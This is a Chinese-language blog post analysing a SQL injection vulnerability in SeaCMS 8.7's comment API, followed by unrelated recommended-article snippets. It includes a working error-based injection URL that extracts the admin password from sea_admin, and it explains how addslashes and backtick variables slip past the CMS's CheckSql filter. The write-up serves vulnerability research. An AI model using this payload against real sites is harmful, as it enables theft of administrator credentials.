sql string 转date_Seacms 8.7版本SQL注入分析

最新推荐文章于 2024-08-18 03:21:28 发布
最新推荐文章于 2024-08-18 03:21:28 发布
阅读量76 收藏
点赞数
文章标签: sql string 转date 多 if exists sql

e5cdbd771907135419d9f9755a3b140e.png

0x01 前言

好像没发文章了,在t00ls看到一篇seacms8.7的分析文,不过不是最新的版本,好久没看到seacms和maccms这两个cms发新的漏洞了,那个过滤有点恶心。后来还在nosec看到一篇离新版9.0比较近的一个版本8.9的一个变量覆盖到sql注入文章,但是我复现不成功,我拿的是6.53的版本,原因后面会讲到。

0x02 环境

Web: phpstudy and MAMP System: Windows 7 X64 and MacOS Browser: Firefox Quantum and Chrome MySQL: 5.5 php: 5.4

0x03 漏洞详情

漏洞复现

payload:

http://10.211.55.4/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

baf723708de730bc41dfc344fa074ea9.png

漏洞分析

在此之前我在MySQL 5.6、5.7上面复现都不成功,因为这两个版本用extractvalue()updatexml()报错注入不成功,后来换了系统Linux和Windows还有macOS来测试也是一样,和PHP、Apache的版本没有影响只要的还是MySQL的版本问题,所以大家测试的时候注意一下版本。

漏洞文件是在:comment/api/index.php

<?php
session_start();
require_once("../../include/common.php");
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
//缓存第一页的评论
if($page<2)
{
    if(file_exists($jsoncachefile))
    {
        $json=LoadFile($jsoncachefile);
        die($json);
    }
}
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{
    createTextFile($h,$jsoncachefile);
}
die($h);    


function ReadData($id,$page)
{
    global $type,$pCount,$rlist;
    $ret = array("","",$page,0,10,$type,$id);
    if($id>0)
    {
        $ret[0] = Readmlist($id,$page,$ret[4]);
        $ret[3] = $pCount;
        $x = implode(',',$rlist);
        if(!empty($x))
        {
        $ret[1] = Readrlist($x,1,10000);
        }
    }   
    $readData = FormatJson($ret);
    return $readData;
}

function Readmlist($id,$page,$size)
{
    global $dsql,$type,$pCount,$rlist;
    $ml=array();
    if($id>0)
    {
        $sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";
        $rs = $dsql ->GetOne($sqlCount);
        $pCount = ceil($rs['dd']/$size);
        $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";
        $dsql->setQuery($sql);
        $dsql->Execute('commentmlist');
        while($row=$dsql->GetArray('commentmlist'))
        {
            $row['reply'].=ReadReplyID($id,$row['reply'],$rlist);
            $ml[]="{"cmid":".$row['id'].","uid":".$row['uid'].","tmp":"","nick":"".$row['username']."","face":"","star":"","anony":".(empty($row['username'])?1:0).","from":"".$row['username']."","time":"".date("Y/n/j H:i:s",$row['dtime'])."","reply":"".$row['reply']."","content":"".$row['msg']."","agree":".$row['agree'].","aginst":".$row['anti'].","pic":"".$row['pic']."","vote":"".$row['vote']."","allow":"".(empty($row['anti'])?0:1)."","check":"".$row['ischeck'].""}";
        }
    }
    $readmlist=join($ml,",");
    return $readmlist;
}

function Readrlist($ids,$page,$size)
{
    global $dsql,$type;
    $rl=array();
    $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";
    $dsql->setQuery($sql);
    $dsql->Execute('commentrlist');
    while($row=$dsql->GetArray('commentrlist'))
    {
        $rl[]=""".$row['id']."":{"uid":".$row['uid'].","tmp":"","nick":"".$row['username']."","face":"","star":"","anony":".(empty($row['username'])?1:0).","from":"".$row['username']."","time":"".$row['dtime']."","reply":"".$row['reply']."","content":"".$row['msg']."","agree":".$row['agree'].","aginst":".$row['anti'].","pic":"".$row['pic']."","vote":"".$row['vote']."","allow":"".(empty($row['anti'])?0:1)."","check":"".$row['ischeck'].""}";
    }
    $readrlist=join($rl,",");
    return $readrlist;
}

传入$rlist的值为我们构造的sql语句:

@`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select (password)from sea_admin))),@`'`

通过ReadData函数,implode处理后传入Readrlist函数

可以看到执行的SQL语句是

916de44e34ef946e5a4197b9150e0107.png

它在$dsql->Execute('commentrlist');这句的时候会有一个SQL的安全检测

文件在include/sql.class.phpCheckSql函数

//完整的SQL检查
    while (true)
    {
        $pos = strpos($db_string, ''', $pos + 1);
        if ($pos === false)
        {
            break;
        }
        $clean .= substr($db_string, $old_pos, $pos - $old_pos);
        while (true)
        {
            $pos1 = strpos($db_string, ''', $pos + 1);
            $pos2 = strpos($db_string, '', $pos + 1);
            if ($pos1 === false)
            {
                break;
            }
            elseif ($pos2 == false || $pos2 > $pos1)
            {
                $pos = $pos1;
                break;
            }
            $pos = $pos2 + 1;
        }
        $clean .= '$s$';
        $old_pos = $pos + 1;
    }
    $clean .= substr($db_string, $old_pos);
    $clean = trim(strtolower(preg_replace(array('~s+~s' ), array(' '), $clean)));

可以看到这里没有把我们的报错函数部分代入进去,如果代入进去检测的话就会这里检测到

a336dc2f786834b24bc6a30e26cfcd49.png

所以上面构造的语句也很有意思

cd7d0de2af061b366483b6823438cf6e.png

后面$clean就是要送去检测的函数,通过一番处理后得到的值为

4e3339aa41ac070391c08fe2c0be0f1a.png

后面返回来执行的的SQL语句还是原样没动

795e7628fe0037d7eee4c87033c16b94.png

基本分析就完成了。

最终执行的语句:

SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (@`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select (password)from sea_admin))),@`'`) ORDER BY id DESC

还有一些问题就是构造语句的问题。

刚开始传入的%27后面怎么变成了转义后的单引号?

开头的时候require_once("../../include/common.php");就包含了这个文件,里面有一个_RunMagicQuotes函数,如果PHP配置没有开启get_magic_quotes_gpc就会用到这个函数,这个函数是把值经过addslashes函数的处理。此函数的作用是为所有的 ' (单引号), " (双引号), (反斜线) and 空字符和以会自动转为含有反斜线的转义字符。

所以后面的SQL语句就会加上转义符号,然后经过CheckSql函数的时候就绕过了对报错语句的检测。

function _RunMagicQuotes(&$svar)
{
    if(!get_magic_quotes_gpc())
    {
        if( is_array($svar) )
        {
            foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        }
        else
        {
            $svar = addslashes($svar);
        }
    }
    return $svar;
}

为什么要加上``两个反引号和@?

in在MySQL里面用法是:

select * from where field in (value1,value2,value3,…)

value1必须是一个值,整数型或者文本型都可以,如果用单引号的话就会变成三个转义'''

`在MySQL上面是作为一个转义符号来使用,一般为了不让和系统的变量冲突所以使用,一般在数据库名、表名、字段名使用,所以这里用@来使这个成为一个变量类型。

0x04 后记

在6.53的版本中include/common.php中的44-47行接收到变量

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}

但是在75行这里又重新赋值了

require_once(sea_DATA."/config.cache.inc.php");

e4538e60f873e3b5efb777ae61e2c07d.png

不懂8.9的版本是否是这样,在官网拿不到8.9的源码。

0x05 参考

https://www.cnblogs.com/shijianchuzhenzhi/p/6193097.html

https://www.t00ls.net/thread-49691-1-1.html

https://nosec.org/home/detail/2222.html

https://blog.csdn.net/zpy1998zpy/article/details/80631036

https://www.cnblogs.com/Lcy-Sun0419/p/7843912.html

weixin_39974958
关注
网络安全- 实战篇 技能提升丨Seacms 8.7版本SQL注入分析
Coisini的博客
05-30 506
有些小伙伴刚刚接触SQL编程,对SQL注入表示不太了解。其实在Web攻防中,SQL注入就是一个技能繁杂项,为了帮助大家能更好的理解和掌握,今天小编将要跟大家分享一下关于Seacms 8.7版本SQL注入分析的内容,一定要认真学习哦。 0x01环境 Web:phpstudy and MAMP System:Windows 7 X64 and MacOS Browser:Firefox Quantu...
HQL(Hive SQL) 之查询语句专题汇总
xiaohu21的博客
09-06 2130
HQL(Hive SQL) 之查询语句专题汇总 1. 背景 hive本身是一个将sql语句换为mapreduce 程序运行的换器 hive可以把结构化数据换到一张表上,并提供查询和分析的功能 针对这个过程,hive从sql优化、从mapreduce优化这2个大的角度来提升hive的性能表现。 sql优化,这个基于现有的第三方组件是比较成熟的技术解决方案。但优化mapreduce则需要更多精力。因为mapreduce代码是根据模板,将sql经过这个模板,换为mapreduce程序。 hive本身是一
java.util.Date、java.sql.DateString三者之间的
03-18
此java文件包括常用的日期类型之间的换,包括java.util.Date、java.sql.DateString之间的任意类型、格式换......
Python之time与datetime获得系统时间
ZONGXP的博客
10-10 6599
python有两个模块可以用来获得系统时间,分别是time与datetime模块。平时经常用到,现查又找不到总结的比较全面的文章,因此做一个总结归纳。 1 time模块 time精度只能到秒,具体使用方法如下 import time # 生成timestamp time.time() # 输出1970年到现在的时间间隔 # 1539154145.183094 time.localtime...
sql 将字符串换为日期
weixin_41292640的博客
07-19 1176
SQL 中,将字符串换为日期(或时间戳)是一个常见的需求,这通常涉及到使用特定的日期函数或换函数,具体取决于你使用的数据库系统。以下是在一些流行的数据库系统中将字符串换为日期的示例:MySQL:使用STR_TO_DATE函数。登录后复制 SELECT STR_TO_DATE('2023-10-23', '%...
sql中将String类型的时间化为date类型
小馒头味的博客
07-20 5727
sql换字段类型:将String类型的时间化为date类型 create_time 字段为date类型 createTime 传递的值为字符串类型 <if test="createTime!= null and createTime!= ''"> AND create_time between (#{startTime}::timestamp) and (#{endTime}::...
MySQL SQL语句字符串DATE
最新发布
weixin_42012131的博客
08-18 99
我整理的一些关于【MySQL】的项目学习资料(附讲解~~)和大家一起分享、学习一下:https://d.51cto.com/yOSbkR如何将MySQL SQL语句字符串DATE 在数据库开发中,处理日期数据是一项重要的任务。有时候,我们会遇到需要将字符串格式的日期换为MySQLDATE类型的情况。本文将指导你如...
Hive SQL操作与函数自定义(一)
热门推荐
梓纾的专栏
09-21 1万+
Hive SQl操作简介;关于UDF、UDAF、UDTF的自定义;以及其他一些整理资料(例如自定义函数jar包的放在那里,远程调试等)
PostgreSQL SQL 语言:数据类型
weixin_33712987的博客
08-17 1965
本文档为PostgreSQL 9.6.0文档,本载已得到原译者彭煜玮授权。 1. 数字类型 数字类型由2、4或8字节的整数以及4或8字节的浮点数和可选精度小数组成。Table 8-2列出了所有可用类型。 Table 8-2. 数字类型 下面的几节详细描述这些类型。 1.1. 整数类型 类型smallint、integer和bigint存储各种范围的全...
GBase 8s SQL 指南:教程———12 创建和使用SPL例程
aisirea的博客
04-11 1145
本部分描述如何创建和使用SPL例程。SPL例程是以GBase 8s "存储过程语言”(SPL) 编写的用户定义的例程。GBase 8s SPL是提供流控制的SQL的扩展,诸如循环和分支。 在数据库上有Resource权限的任何人都可创建SPL例程。 尽可能地解析和优化以SQL编写的例程,然后以可执行的格式存储在系统目录表中。对 于SQL密集的任务,SQL例程可能是一个好的选择。SPL例程可执行以C或其他外部 语言编写的例程,且外部的例程可执行SPL例程。 您可使用SPL例程来执行您可以SQL执行的任何.
sqldatestring
weixin_33971977的博客
03-27 225
涉及的函数 date_format(date, format) 函数,MySQL日期格式化函数date_format() unix_timestamp() 函数 str_to_date(str, format) 函数 from_unixtime(unix_timestamp, format) 函数,MySQL时间戳格式化函数from_unixtime 时间字符串 ...
Stringsql.Datesql.Time
weixin_45920385的博客
11-21 2416
Stringsql.Datesql.Time String类型换成java.sql.Date类型不能直接进行换,首先要将String换成java.util.Date,在化成java.sql.Date public static java.sql.Date strToDate(String str) throws ParseException { SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd"); /
Stringjava.sql.Date和java.util.Date等时间
qq_41353397的博客
06-05 810
【代码】Stringjava.sql.Date和java.util.Date等时间换。
java、oracle、jsp中stringdatesql.date
cktmyh的专栏
06-26 1916
1.string格式化为Date对象: SimpleDateFormat fmt =new SimpleDateFormat("yyyy-MM-dd"); Date date = fmt.parse(str); 注意:引入的是:java.text.DateFormat 2.Date格式化为String对象: SimpleDateFormat sdf = new S
String Date 类型
wowSpark
11-17 1094
总的来说就是将17-NOV-15 19:20:08.8这种数据格式插入到字段类型为date类型的数据库中。将17-NOV-15 15:08:38.1 这种类型的字符串换成 它对应的date类型 Date date; DateFormat df = new SimpleDateFormat("dd-MMM-yy HH:mm:sss", Locale.US); date = df.parse("17-
SQL中,可以使用不同的函数来换字符串日期格式。以下是一些常用的函数:
qq_49641620的博客
09-20 1万+
这将把字符串 ‘2023-07-04’ 换为日期格式,并返回结果作为 converted_date。这将把字符串 ‘2023-07-04’ 换为日期格式,并返回结果作为 converted_date
sql语句中date类型怎么换为string
07-14
在不同的数据库中,将Date类型换为String的方法可能会有所不同。以下是一些常见数据库中的示例: 1. MySQL:使用DATE_FORMAT函数将Date类型换为String。例如,将名为"date_column"的Date换为格式为"YYYY-MM...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值